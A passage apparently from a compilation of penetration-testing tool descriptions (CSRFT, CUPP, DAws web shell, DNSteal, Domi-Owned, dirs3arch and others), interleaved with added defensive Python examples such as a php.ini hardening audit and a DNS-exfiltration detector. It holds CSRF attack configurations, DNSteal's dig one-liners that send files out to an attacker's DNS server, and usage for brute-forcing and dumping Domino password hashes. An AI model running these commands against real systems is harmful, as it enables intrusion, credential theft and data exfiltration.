                        "url": "http://www.vulnerable.com/changePassword.php?newPassword=csrfAttacks"
                    }
                ]
            }
        ]
    }
}

GET Request with dictionary attack

Here is a basic example of a JSON configuration file. For every entry in the dictionary file, there will be an HTTP request made.
{
    "audit": {
        "name": "PoC done with Automatic Tool",
        "scenario": [
            {
                "attack": [
                    {
                        "file": "./dicos/passwords.txt",
                        "method": "GET",
                        "type_attack": "dico",
                        "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"
                    }
                ]
            }
        ]
    }
}

POST Request with special value attack

{
    "audit": {
        "name": "PoC done with Automatic Tool",
        "scenario": [
            {
                "attack": [
                    {
                        "form": "/tmp/csrft/form.html",
                        "method": "POST",
                        "type_attack": "special_value"
                    }
                ]
            }
        ]
    }
}

The form already includes the malicious payload. So it just has to be executed by the victim.
I hope you understood the principles. I didn't write an example for a POST with dictionary attack because there will be one in the next section.

Ok but what do Scenario and Attack mean ?

A scenario is composed of attacks. Those attacks can be simultaneous or at different times.
For example, you want to sign the user in and THEN you want him to perform some unwanted actions. You can specify it in the JSON file.
Let's take an example with both POST and GET requests:
{
    "audit": {
        "name": "DeepSec | Login the admin, give privilege to the Hacker and log him out",
        "scenario": [
            {
                "attack": [
                    {
                        "method": "POST",
                        "type_attack": "dico",
                        "file": "passwords.txt",
                        "form": "deepsec_form_log_user.html",
                        "comment": "attempt to connect the admin with a list of selected passwords"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vulnwebsite/index.php/welcome/upgrade/27",
                        "comment": "then, after the login session, we expect the admin to be logged in, attempt to upgrade our account"
                    }
                ]
            },
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
                        "url": "http://192.168.56.1/vulnwebsite/index.php/welcome/logout",
                        "comment": "The final step is to logout the admin"
                    }
                ]
            }
        ]
    }
}

You can now define some "steps", different attacks that will be executed in a certain order.
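The scenario format above is easy to get subtly wrong (a dico attack without its dictionary file, a GET attack without the <%value%> token), and the server only tells you at run time. The following is an added example, not CSRFT's own code: it checks a scenario file for those inconsistencies, lists the steps in execution order, and expands a dico GET attack into the request list the server would work through. It assumes exactly the field names shown in the templates (audit, scenario, attack, method, type_attack, url, form, file) and the <%value%> token; the sample configuration is constructed.

```python
import json

TOKEN = "<%value%>"  # the substitution token used by CSRFT's dico attacks


def check_attack(attack):
    """Return the list of problems found in one attack entry (empty when it is consistent)."""
    problems = []
    method = attack.get("method")
    kind = attack.get("type_attack")
    if method not in ("GET", "POST"):
        problems.append(f"unsupported method {method!r}")
    if kind not in ("special_value", "dico"):
        problems.append(f"unsupported type_attack {kind!r}")
    # GET attacks carry the target in "url", POST attacks in an HTML form file
    target_key = "url" if method == "GET" else "form"
    target = attack.get(target_key)
    if target is None:
        problems.append(f"{method} attack needs a {target_key!r} field")
    if kind == "dico":
        if "file" not in attack:
            problems.append("dico attack needs a 'file' field (the dictionary to iterate)")
        if method == "GET" and target and TOKEN not in target:
            problems.append(f"dico GET attack has no {TOKEN} token in its url")
    if kind == "special_value" and method == "GET" and target and TOKEN in target:
        problems.append(f"special_value attack still contains the {TOKEN} token")
    return problems


def check_config(config):
    """Map 'step<i>.attack<j>' -> problems for every inconsistent attack in the file."""
    report = {}
    for i, step in enumerate(config.get("audit", {}).get("scenario", [])):
        for j, attack in enumerate(step.get("attack", [])):
            problems = check_attack(attack)
            if problems:
                report[f"step{i}.attack{j}"] = problems
    return report


def describe_scenario(config):
    """One line per attack, in the order the server executes the steps (as in the DeepSec example)."""
    lines = []
    for i, step in enumerate(config["audit"]["scenario"]):
        for attack in step["attack"]:
            what = attack.get("url") or attack.get("form")
            lines.append(f"step {i}: {attack['method']} {attack['type_attack']} -> {what}")
    return lines


def expand_dico_url(url, words):
    """One request per dictionary entry, as the dico template says: substitute the token."""
    return [url.replace(TOKEN, word) for word in words]


def load_config(text):
    """Parse the JSON text of a configuration file."""
    return json.loads(text)


# Constructed configuration: the dico GET template from above plus a second step
# that forgot its dictionary file.
SAMPLE_CONFIG = load_config("""
{"audit": {"name": "PoC done with Automatic Tool", "scenario": [
  {"attack": [{"file": "./dicos/passwords.txt", "method": "GET", "type_attack": "dico",
               "url": "http://www.vulnerable.com/changePassword.php?newPassword=<%value%>"}]},
  {"attack": [{"method": "POST", "type_attack": "dico", "form": "/tmp/csrft/form.html"}]}
]}}
""")

if __name__ == "__main__":
    for line in describe_scenario(SAMPLE_CONFIG):
        print(line)
    print(check_config(SAMPLE_CONFIG))
```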
Use cases

A) I want to write my specific JSON configuration file and launch it by hand

Based on the templates which are available, you can easily create your own. If you have any trouble creating it, feel free to contact me and I'll try to help you as much as I can, but it shouldn't be this complicated.
Steps to succeed:
1) Create your configuration file, see samples in the conf/ folder
2) Add your .html files in the exploits/ folder with the different payloads if the CSRF is POST vulnerable
3) If you want to do a dictionary attack, add your dictionary file to the dicos/ folder
4) Replace the value of the field you want to perform this attack with the token <%value%> => either in your URLs for GET exploitation, or in the HTML files for POST exploitation.
5) Launch the application: node server.js conf/test.json

B) I want to automate attacks really easily

To do so, I developed a Python script csrft_utils.py in the utils folder that will do this for you.
Here are some basic use cases:
* GET parameter with dictionary attack : *
$ python csrft_utils.py --url="http://www.vulnerable.com/changePassword.php?newPassword=csvulnerableParameter" -param=newPassword --dico_file="../dicos/passwords.txt"

* POST parameter with special value attack : *
$ python csrft_utils.py --form=http://website.com/user.php --id=changePassword --param=password password=newPassword --special_value

Download CSRFT
CUPP - COMMON USER PASSWORDS PROFILER

The most common form of authentication is the combination of a username and a password or passphrase. If both match values stored within a locally stored table, the user is authenticated for a connection. Password strength is a measure of the difficulty involved in guessing or breaking the password through cryptographic techniques or library-based automated testing of alternate values.
A weak password might be very short or only use alphanumeric characters, making decryption simple. A weak password can also be one that is easily guessed by someone profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.
That is why CUPP was born, and it can be used in situations like legal penetration tests or forensic crime investigations.
Options

Usage: cupp.py [OPTIONS]
-h    this menu
-i    Interactive questions for user password profiling
-w    Use this option to profile an existing dictionary, or WyD.pl output to make some pwnsauce :)
-l    Download huge wordlists from repository
-a    Parse default usernames and passwords directly from Alecto DB. Project Alecto uses purified databases of Phenoelit and CIRT which were merged and enhanced.
-v    Version of the program

Configuration

CUPP has a configuration file cupp.cfg with instructions.

Download Cupp
CUSTOM-SSH-BACKDOOR - SSH BACKDOOR USING PARAMIKO

Custom SSH backdoor, coded in Python using Paramiko.
Paramiko is a Python (2.6+, 3.3+) implementation of the SSHv2 protocol, providing both client and server functionality. While it leverages a Python C extension for low level cryptography (PyCrypto), Paramiko itself is a pure Python interface around SSH networking concepts.

Download Custom-SSH-Backdoor
DAMN VULNERABLE WEB APP - PHP/MYSQL TRAINING WEB APPLICATION THAT IS DAMN VULNERABLE

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a classroom environment.
WARNING!
Damn Vulnerable Web App is damn vulnerable! Do not upload it to your hosting provider's public html folder or any working web server as it will be hacked. I recommend downloading and installing XAMPP onto a local machine inside your LAN which is used solely for testing.
We do not take responsibility for the way in which any one uses Damn Vulnerable Web App (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility; it is the responsibility of the person/s who uploaded and installed it.

Download Damn Vulnerable Web App


DAWS - ADVANCED WEB SHELL (WINDOWS/LINUX)

There are multiple things that make DAws better than every web shell out there:
1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this feature is widely used in every section and function of the shell.
2. Automatic Encoding; DAws randomly and automatically encodes most of your GET and POST data using XOR (randomized key for every session) + Base64 (we created our own Base64 encoding functions instead of using the PHP ones to bypass Disablers) which will allow your shell to bypass pretty much every WAF out there.
3. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main feature is that everything is dynamically printed; the permissions of every file and folder are checked, and the functions that can be used will be available based on these permissions, this will save time and make life much easier.
4. Tools: DAws holds a bunch of useful tools such as "bpscan" which can identify usable and unblocked ports on the server within a few minutes which can later on allow you to go for a bind shell for example.
5. Everything that can't be used at all will be simply removed so users do not have to waste their time. We're for example mentioning the execution of C++ scripts when there are no C++ compilers on the server (DAws would have checked for multiple compilers in the first place); in this case, the function would be automatically removed and the user would know.
6. Supports Windows and Linux.
7. Open source.
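Item 1 is the point a defender should take from this list: a php.ini that disables only shell_exec leaves the shell five other ways to run a command and a second way to fetch a file. The following is an added example, not DAws' code: it reads the disable_functions directive from php.ini text, reports which members of the fallback chains named above are still callable, and emits a directive that closes them. The php.ini sample is constructed; curl_exec is used as the function name behind "Curl" and file_get_contents behind "file_get_content".

```python
import re

# The command-execution chain named in the DAws description (item 1 above)
EXEC_CHAIN = {"shell_exec", "exec", "passthru", "system", "popen", "proc_open"}
# The download fallback named in the same item
DOWNLOAD_CHAIN = {"curl_exec", "file_get_contents"}

WEAK_INI = """\
; constructed sample: only the function everyone knows about is blocked
display_errors = Off
disable_functions = shell_exec
"""


def parse_disable_functions(ini_text):
    """Set of names listed in disable_functions; the last directive wins, as in php.ini."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()           # drop comments
        m = re.match(r"disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            names = m.group(1).strip().strip('"').split(",")
            disabled = {n.strip().lower() for n in names if n.strip()}
    return disabled


def uncovered(disabled, chain):
    """Members of the chain still callable: any single one is enough for the fallback."""
    return sorted(chain - disabled)


def hardened_directive(disabled):
    """A disable_functions line that keeps what was there and adds both chains."""
    return "disable_functions = " + ",".join(sorted(disabled | EXEC_CHAIN | DOWNLOAD_CHAIN))


def audit(ini_text):
    """Report what each chain can still reach under the given configuration."""
    disabled = parse_disable_functions(ini_text)
    return {"exec": uncovered(disabled, EXEC_CHAIN),
            "download": uncovered(disabled, DOWNLOAD_CHAIN)}


# Two limits of this control: blocking file_get_contents also removes a legitimate
# local read (its network side is better turned off with allow_url_fopen = Off),
# and eval/include are language constructs, not functions, so disable_functions
# cannot touch them; that is why the Extra Info section says include is used.

if __name__ == "__main__":
    print(audit(WEAK_INI))
    print(hardened_directive(parse_disable_functions(WEAK_INI)))
```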

Extra Info

Eval Form:
`include` is being used instead of PHP `eval` to bypass Protection Systems.
Download from Link - Methods:
PHP Curl
File_put_content
Zip - Methods:
Linux: Zip
Windows: Vbs Script
Shells and Tools:
Extra:
`nohup`, if installed, is automatically used for background processing.

Download DAws
DHARMA - A GENERATION-BASED, CONTEXT-FREE GRAMMAR FUZZER

A generation-based, context-free grammar fuzzer.

Requirements

None

Examples

Generate a single test-case.
% ./dharma.py -grammars grammars/webcrypto.dg

Generate a single test case with multiple grammars.
% ./dharma.py -grammars grammars/canvas2d.dg grammars/mediarecorder.dg

Generating test-cases as files.
% ./dharma.py -grammars grammars/webcrypto.dg -storage . -count 5

Generate test-cases, send each over WebSocket to Firefox, observe the process for crashes and bucket them.
% ./dharma.py -server -grammars grammars/canvas2d.dg -template grammars/var/templates/html5/default.html
% ./framboise.py -setup inbound64-release -debug -worker 4 -testcase ~/dev/projects/fuzzers/dharma/grammars/var/index.html

Benchmark the generator.
% time ./dharma.py -grammars grammars/webcrypto.dg -count 10000 > /dev/null

Grammar Cheatsheet

Comment
%%% comment

Controls
%const% name := value

Sections
%section% := value
%section% := variable
%section% := variance

Extension methods
%range%(0-9)
%range%(0.0-9.0)
%range%(a-z)
%range%(!-~)
%range%(0x100-0x200)
%repeat%(+variable+)
%repeat%(+variable+, ", ")
%uri%(path)
%uri%(lookup_key)
%block%(path)
%choice%(foo, "bar", 1)

Assigning values
digit :=
    %range%(0-9)

sign :=
    +

value :=
    +sign+%repeat%(+digit+)

Using values
+value+

Assigning variables
variable :=
    @variable@ = new Foo();

Using variables
value :=
    !variable!.bar();

Referencing values from common.dg
value :=
    attribute=+common:number+

Calling javascript library functions
foo :=
    Random.pick([0,1]);
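To see how the notation in the cheatsheet turns into test cases, here is a minimal interpreter for the subset used under "Assigning values". It is an added example, not dharma's own code, and it implements only that subset: %%% comments, `name :=` rules with one alternative per indented line, +name+ references, %range%(a-b) and %repeat%(+name+[, "sep"]). The grammar text is constructed and extends the cheatsheet's digit/sign/value rules with a second alternative for sign and a rule that emits function calls.

```python
import random
import re

GRAMMAR = """\
%%% sign and value as in the cheatsheet, with a second alternative for sign
digit :=
    %range%(0-9)

sign :=
    +
    -

value :=
    +sign+%repeat%(+digit+)

call :=
    foo(+value+, +value+);
    bar([%repeat%(+value+, ", ")]);
"""

RULE = re.compile(r"^(\w+)\s*:=\s*$")
RANGE = re.compile(r"%range%\(([^-)]+)-([^)]+)\)")
REPEAT = re.compile(r'%repeat%\(\+(\w+)\+(?:,\s*"([^"]*)")?\)')
REF = re.compile(r"\+(\w+)\+")


def parse_grammar(text):
    """Map rule name -> list of alternatives (each indented line under 'name :=')."""
    rules, current = {}, None
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("%%%"):
            continue
        m = RULE.match(raw)
        if m:
            current = m.group(1)
            rules[current] = []
        elif current is not None and raw[0].isspace():
            rules[current].append(raw.strip())
        else:
            raise ValueError(f"unexpected line: {raw!r}")
    return rules


def pick_range(lo, hi, rng):
    """%range%(0-9) yields an integer in the range, %range%(a-z) a character."""
    if lo.isdigit() and hi.isdigit():
        return str(rng.randint(int(lo), int(hi)))
    return chr(rng.randint(ord(lo), ord(hi)))


def generate(rules, name, rng, max_repeat=8, depth=0):
    """Expand one rule: choose an alternative, then resolve repeats, ranges and references."""
    if depth > 64:
        raise RecursionError("grammar recursion too deep")
    if name not in rules:
        raise KeyError(f"undefined rule +{name}+")
    text = rng.choice(rules[name])
    # repeats first, because their argument is itself a +reference+
    text = REPEAT.sub(lambda m: (m.group(2) or "").join(
        generate(rules, m.group(1), rng, max_repeat, depth + 1)
        for _ in range(rng.randint(1, max_repeat))), text)
    text = RANGE.sub(lambda m: pick_range(m.group(1), m.group(2), rng), text)
    return REF.sub(lambda m: generate(rules, m.group(1), rng, max_repeat, depth + 1), text)


def generate_many(text, name, count, seed=0):
    """Produce `count` test cases from a grammar string; a fixed seed makes a run reproducible."""
    rules, rng = parse_grammar(text), random.Random(seed)
    return [generate(rules, name, rng) for _ in range(count)]


def valid_value(case):
    """Shape check for the value rule: a sign followed by 1..8 digits."""
    return re.fullmatch(r"[+-]\d{1,8}", case) is not None


def valid_call(case):
    """Shape check for the call rule: foo(v, v); or bar([v, ...]); with valid values."""
    m = re.fullmatch(r"foo\((.+), (.+)\);|bar\(\[(.+)\]\);", case)
    if not m:
        return False
    inner = m.group(3) if m.group(3) is not None else f"{m.group(1)}, {m.group(2)}"
    return all(valid_value(v) for v in inner.split(", "))


if __name__ == "__main__":
    for case in generate_many(GRAMMAR, "call", 5):
        print(case)
```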

Download Dharma
DIRS3ARCH V0.3.0 - HTTP(S) DIRECTORY/FILE BRUTE FORCER

dirs3arch is a simple command line tool designed to brute force hidden directories and files in websites.
It's written in python3 and all third-party libraries are included.

Operating Systems supported

Windows XP/7/8
GNU/Linux
MacOSX

Features

Multithreaded
Keep alive connections
Support for multiple extensions (-e|--extensions asp,php)
Reporting (plain text, JSON)
Detect not found web pages when 404 not found errors are masked (.htaccess, web.config, etc).
Recursive brute forcing
HTTP(S) proxy support
Batch processing (-L)

Examples

Scan www.example.com/admin/ to find php files:
python3 dirs3arch.py -u http://www.example.com/admin/ -e php

Scan www.example.com to find asp and aspx files with SSL:
python3 dirs3arch.py -u https://www.example.com/ -e asp,aspx

Scan www.example.com with an alternative dictionary (from DirBuster):
python3 dirs3arch.py -u http://www.example.com/ -e php -w db/dirbuster/directory-list-2.3-small.txt

Scan with HTTP proxy (localhost port 8080):
python3 dirs3arch.py -u http://www.example.com/admin/ -e php --http-proxy localhost:8080

Scan with custom User-Agent and custom header (Referer):
python3 dirs3arch.py -u http://www.example.com/admin/ -e php --user-agent "My User-Agent" --header "Referer: www.google.com"

Scan recursively:
python3 dirs3arch.py -u http://www.example.com/admin/ -e php -r

Scan recursively excluding server-status directory and 200 status codes:
python3 dirs3arch.py -u http://www.example.com/ -e php -r --exclude-subdir "server-status" --exclude-status 200

Scan includes, classes directories in /admin/:
python3 dirs3arch.py -u http://www.example.com/admin/ -e php --scan-subdir "includes, classes"

Scan without following HTTP redirects:
python3 dirs3arch.py -u http://www.example.com/ -e php --no-follow-redirects

Scan VHOST "backend" at IP 192.168.1.1:
python3 dirs3arch.py -u http://backend/ --ip 192.168.1.1

Scan www.example.com to find wordpress plugins:
python3 dirs3arch.py -u http://www.example.com/wordpress/wp-content/plugins/ -e php -w db/wordpress/plugins.txt

Batch processing:
python3 dirs3arch.py -L urllist.txt -e php

Third-party code

colorama
oset
urllib3
sqlmap

Changelog

0.3.0 - 2015.2.5 Fixed issue3, fixed timeout exception, ported to python3, other bugfixes
0.2.7 - 2014.11.21 Added URL list feature (-L). Changed output. Minor fixes
0.2.6 - 2014.9.12 Fixed bug when dictionary size is greater than thread count. Fixed URL encoding bug (issue2).
0.2.5 - 2014.9.2 Shows Content-Length in output and reports, added default.conf file (for setting defaults) and report auto save feature added.
0.2.4 - 2014.7.17 Added Windows support, --scan-subdir|--scan-subdirs argument added, --exclude-subdir|--exclude-subdirs added, --header argument added, dirbuster dictionaries added, fixed some concurrency bugs, MVC refactoring
0.2.3 - 2014.7.7 Fixed some bugs, minor refactorings, exclude status switch, "pause/next directory" feature, changed help structure, expanded default dictionary
0.2.2 - 2014.7.2 Fixed some bugs, showing percentage of tested paths and added report generation feature
0.2.1 - 2014.5.1 Fixed some bugs and added recursive option
0.2.0 - 2014.1.31 Initial public release

Download Dirs3arch
DISCOVER - CUSTOM BASH SCRIPTS USED TO AUTOMATE VARIOUS PENTESTING TASKS

For use with Kali Linux. Custom bash scripts used to automate various pentesting tasks.

Download, setup & usage

git clone git://github.com/leebaird/discover.git /opt/discover/
All scripts must be run from this location.

cd /opt/discover/
./setup.sh
./discover.sh

RECON
1. Domain
2. Person
3. Parse salesforce
SCANNING
4. Generate target list
5. CIDR
6. List
7. IP or domain
WEB
8. Open multiple tabs in Iceweasel
9. Nikto
10. SSL
MISC
11. Crack WiFi
12. Parse XML
13. Start a Metasploit listener
14. Update
15. Exit

RECON

Domain
RECON
1. Passive
2. Active
3. Previous menu

Passive combines goofile, goog-mail, goohost, theHarvester, Metasploit, dnsrecon, URLCrazy, Whois and multiple websites.
Active combines Nmap, dnsrecon, Fierce, lbd, WAF00W, traceroute and Whatweb.

Person
RECON
First name:
Last name:

Combines info from multiple websites.

Parse salesforce
Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.
Enter the location of your list:

Gather names and positions into a clean list.

SCANNING

Generate target list
SCANNING
1. Local area network
2. NetBIOS
3. netdiscover
4. Ping sweep
5. Previous menu

Use different tools to create a target list including Angry IP Scanner, arp-scan, netdiscover and nmap pingsweep.

CIDR, List, IP or domain
Type of scan:
1. External
2. Internal
3. Previous menu

External scan will set the nmap source port to 53 and the max-rtt-timeout to 1500ms.
Internal scan will set the nmap source port to 88 and the max-rtt-timeout to 500ms.
Nmap is used to perform host discovery, port scanning, service enumeration and OS identification.
Matching nmap scripts are used for additional enumeration.
Matching Metasploit auxiliary modules are also leveraged.

WEB

Open multiple tabs in Iceweasel
Open multiple tabs in Iceweasel with:
1. List
2. Directories from a domain's robots.txt.
3. Previous menu

Use a list containing IPs and/or URLs.
Use wget to pull a domain's robots.txt file, then open all of the directories.

Nikto
Run multiple instances of Nikto in parallel.
1. List of IPs.
2. List of IP:port.
3. Previous menu

SSL
Check for SSL certificate issues.
Enter the location of your list:

Use sslscan and sslyze to check for SSL/TLS certificate issues.

MISC

Crack WiFi
Crack wireless networks.

Parse XML
Parse XML to CSV.
1. Burp (Base64)
2. Nessus
3. Nexpose
4. Nmap
5. Qualys
6. Previous menu

Start a Metasploit listener
Setup a multi/handler with a windows/meterpreter/reverse_tcp payload on port 443.

Update
Use to update Kali Linux, Discover scripts, various tools and the locate database.

Download Discover
DNSTEAL - DNS EXFILTRATION TOOL FOR STEALTHILY SENDING FILES OVER DNS REQUESTS

This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
Below is an image showing an example of how to use:

On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

Support for multiple files
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done

gzip compression supported
It also supports compression of the file to allow for faster transfer speeds; this can be achieved using the "-z" switch:
python dnsteal.py 127.0.0.1 -z

Then on the victim machine send a gzipped file like so:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done

or for multiple, gzip compressed files:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
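The loops above leave a distinctive trace on any resolver in the path: each `xxd -p` line (60 hex characters) becomes the leftmost label of a query, so one client sends a burst of long, purely hexadecimal labels under a single parent name. The following is an added example, not part of dnsteal: it scans DNS query log lines in a constructed '<epoch> <client> <qname>' shape, groups hex-label queries by client and parent name, and reports the groups that carry enough data to be a file rather than a hash-like CDN hostname. The thresholds are assumptions to tune per network, and the log lines are constructed.

```python
import re
from collections import defaultdict

HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")   # xxd -p emits 60 hex chars; DNS labels are at most 63


def hex_label(qname):
    """Return (label, parent) when the leftmost label looks like an xxd chunk, else None."""
    label, _, parent = qname.lower().rstrip(".").partition(".")
    if parent and HEX_LABEL.match(label):
        return label, parent
    return None


def find_exfil(log_lines, min_queries=5, min_bytes=128):
    """Group hex-label queries by (client, parent) and report groups that carry enough data."""
    groups = defaultdict(lambda: {"queries": 0, "bytes": 0, "first": None, "last": None})
    for line in log_lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        ts, client, qname = parts[0], parts[1], parts[2]
        hit = hex_label(qname)
        if hit is None:
            continue
        label, parent = hit
        g = groups[(client, parent)]
        g["queries"] += 1
        g["bytes"] += len(label) // 2          # two hex characters per file byte
        g["first"] = g["first"] or ts
        g["last"] = ts
    return [{"client": c, "parent": p, **g} for (c, p), g in sorted(groups.items())
            if g["queries"] >= min_queries and g["bytes"] >= min_bytes]


# Constructed sample: a file leaving 30 bytes per query, among ordinary lookups.
# Each chunk is a 60-character hex label, the width of one xxd -p line.
_chunks = [("%02x" % (0x10 + i)) * 30 for i in range(6)]
SAMPLE_LOG = [
    "1700000000 10.0.0.5 www.example.com",
    "1700000001 10.0.0.5 " + _chunks[0] + ".send.png.filename.com",
    "1700000001 10.0.0.5 " + _chunks[1] + ".send.png.filename.com",
    "1700000002 10.0.0.9 a1b2c3d4e5f6a7b8.cdn.example.net",   # lone hash-like host, stays under threshold
    "1700000002 10.0.0.5 " + _chunks[2] + ".send.png.filename.com",
    "1700000003 10.0.0.5 " + _chunks[3] + ".send.png.filename.com",
    "1700000003 10.0.0.5 mail.example.com",
    "1700000004 10.0.0.5 " + _chunks[4] + ".send.png.filename.com",
    "1700000005 10.0.0.5 " + _chunks[5] + ".send.png.filename.com",
]

if __name__ == "__main__":
    for finding in find_exfil(SAMPLE_LOG):
        print(finding)
```

Gzipped transfers (the -z mode above) look the same on the wire, since the compressed bytes are still hex-encoded into labels; only the byte count per file shrinks.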

Download DNSteal
DOMI-OWNED - TOOL USED FOR COMPROMISING IBM/LOTUS DOMINO SERVERS

Domi-Owned is a tool used for compromising IBM/Lotus Domino servers.
Tested on IBM/Lotus Domino 8.5.2, 8.5.3, 9.0.0, and 9.0.1 running on Windows and Linux.

USAGE
A valid username and password is not required unless 'names.nsf' and/or 'webadmin.nsf' requires authentication.

FINGERPRINTING
Running Domi-Owned with just the --url flag will attempt to identify the Domino server version, as well as check if 'names.nsf' and 'webadmin.nsf' require authentication.
If a username and password is given, Domi-Owned will check to see if that account can access 'names.nsf' and 'webadmin.nsf' with those credentials.

REVERSE BRUTEFORCE
To perform a reverse bruteforce attack against a Domino server, specify a file containing a list of usernames with -U, a password with -p, and the --bruteforce flag. Domi-Owned will then try to authenticate to 'names.nsf', returning successful accounts.

DUMP HASHES
To dump all Domino accounts with a non-empty hash from 'names.nsf', run Domi-Owned with the --hashdump flag. This prints the results to the screen and writes them to separate out files depending on the hash type (Domino 5, Domino 6, Domino 8).

QUICK CONSOLE
The Domino Quick Console is active by default; however, it will not show the command's output. A workaround to this problem is to redirect the command output to a file, in this case 'log.txt', that is then displayed as a web page on the Domino server.
If the --quickconsole flag is given, Domi-Owned will access the Domino Quick Console, through 'webadmin.nsf', allowing the user to issue native Windows or Linux commands. Domi-Owned will then retrieve the output of the command and display the results in real time, through a command line interpreter. Type exit to quit the Quick Console interpreter, which will also delete the 'log.txt' output file.

EXAMPLES
FINGERPRINT DOMINO SERVER
python domi-owned.py --url http://domino-server.com

PERFORM A REVERSE BRUTEFORCE ATTACK
python domi-owned.py --url http://domino-server.com -U ./usernames.txt -p password --bruteforce

DUMP DOMINO ACCOUNT HASHES
python domi-owned.py --url http://domino-server.com -u user -p password --hashdump

INTERACT WITH THE DOMINO QUICK CONSOLE
python domi-owned.py --url http://domino-server.com -u user -p password --quickconsole

Download Domi-Owned
DOUBLE THE BANG FOR YOUR BUCK WITH ACUNETIX VULNERABILITY SCANNER

Acunetix have announced that they are extending their current free offering of the network security scan, part of their cloud-based web and network vulnerability scanner. Those signing up for a trial of the online version of Acunetix vulnerability scanner will now be able to scan their perimeter servers for network security issues on up to 3 targets with no expiry.
In addition, existing Acunetix customers will also be able to double up on their current license-based quota of scan targets by adding the same amount of network scans, i.e. a 25 scan target license can now make use of an extra 25 network-only scan targets for free.
An analysis of scans performed over the past year following the launch of Acunetix Vulnerability Scanner (online version) shows that on average 50% of the targets scanned have a medium or high network security vulnerability. It's worrying that in the current cybersecurity climate, network devices remain vulnerable to attack. The repercussions of a vulnerable network are catastrophic as seen in some recent, well publicised Lizard Squad attacks, the black hat hacking group mainly known for their claims of DoS attacks.
"Acunetix secure the websites of some of the biggest global enterprises, and with our online vulnerability scanner we are not only bringing this technology within reach of many more businesses but we are also providing free network security scanning technology to aid smaller companies secure their network," said Nick Galea, CEO of Acunetix.

How Acunetix keeps perimeter servers secure

A network security scan checks the perimeter servers, locating any vulnerabilities in the operating system, server software, network services and protocols. Acunetix network security scan uses the OpenVAS database of network vulnerabilities and scans for more than 35,000 network level vulnerabilities. A network scan is where vulnerabilities such as Shellshock, Heartbleed and POODLE are detected, vulnerabilities which continue to plague not only web servers but also a large percentage of other network servers. A network scan will also:
Detect misconfigurations and vulnerabilities in OS, server applications, network services, and protocols
Assess security of detected devices (routers, hardware firewalls, switches and printers)
Scan for trojans, backdoors, rootkits, and other malware that can be detected remotely
Test for weak passwords on FTP, IMAP, SQL servers, POP3, Socks, SSH, Telnet
Check for DNS server vulnerabilities such as Open Zone Transfer, Open Recursion and Cache Poisoning
Test FTP access such as anonymous access potential and a list of writable FTP directories
Check for badly configured Proxy Servers, weak SNMP Community Strings, weak SSL ciphers and many other security weaknesses.
Register for a free trial and start scanning http://www.acunetix.com/free-network-security-scanner/

About Acunetix

Acunetix is the market leader in web application security technology, founded to combat the alarming rise in web attacks. Its products and technologies are the result of a decade of work by a team of highly experienced security developers. Acunetix customers include the U.S. Army, KPMG, Adidas and Fujitsu. More information can be found at www.acunetix.com.

DROOPESCAN - SCANNER TO IDENTIFY ISSUES WITH


SEVERAL CMSS, MAINLY DRUPAL & SILVERSTRIPE

A plugin-based scanner that aids security researchers in


identifying issues with several CMS:
Drupal.
SilverStripe.
Partial functionality for:
Wordpress.

Joomla.

computer:~/droopescan$ droopescan scan drupal -u http://


example.org/ -t 8
[+] No themes found.
[+] Possible interesting urls found:
Default changelog file - https://www.example.org/
CHANGELOG.txt
Default admin - https://www.example.org/user/login
[+] Possible version(s):
7.34
[+] Plugins found:
views https://www.example.org/sites/all/modules/
views/
https://www.example.org/sites/all/modules/views/
README.txt
https://www.example.org/sites/all/modules/views/
LICENSE.txt
token https://www.example.org/sites/all/modules/
token/
https://www.example.org/sites/all/modules/token/
README.txt
https://www.example.org/sites/all/modules/token/
LICENSE.txt
pathauto https://www.example.org/sites/all/modules/
pathauto/
https://www.example.org/sites/all/modules/
pathauto/README.txt

https://www.example.org/sites/all/modules/
pathauto/LICENSE.txt
https://www.example.org/sites/all/modules/
pathauto/API.txt
libraries https://www.example.org/sites/all/modules/
libraries/
https://www.example.org/sites/all/modules/
libraries/CHANGELOG.txt
https://www.example.org/sites/all/modules/
libraries/README.txt
https://www.example.org/sites/all/modules/
libraries/LICENSE.txt
entity https://www.example.org/sites/all/modules/
entity/
https://www.example.org/sites/all/modules/entity/
README.txt
https://www.example.org/sites/all/modules/entity/
LICENSE.txt
google_analytics https://www.example.org/sites/all/
modules/google_analytics/
https://www.example.org/sites/all/modules/
google_analytics/README.txt
https://www.example.org/sites/all/modules/
google_analytics/LICENSE.txt
ctools https://www.example.org/sites/all/modules/
ctools/
https://www.example.org/sites/all/modules/ctools/
CHANGELOG.txt
https://www.example.org/sites/all/modules/ctools/
LICENSE.txt

https://www.example.org/sites/all/modules/ctools/
API.txt
features https://www.example.org/sites/all/modules/
features/
https://www.example.org/sites/all/modules/
features/CHANGELOG.txt
https://www.example.org/sites/all/modules/
features/README.txt
https://www.example.org/sites/all/modules/
features/LICENSE.txt
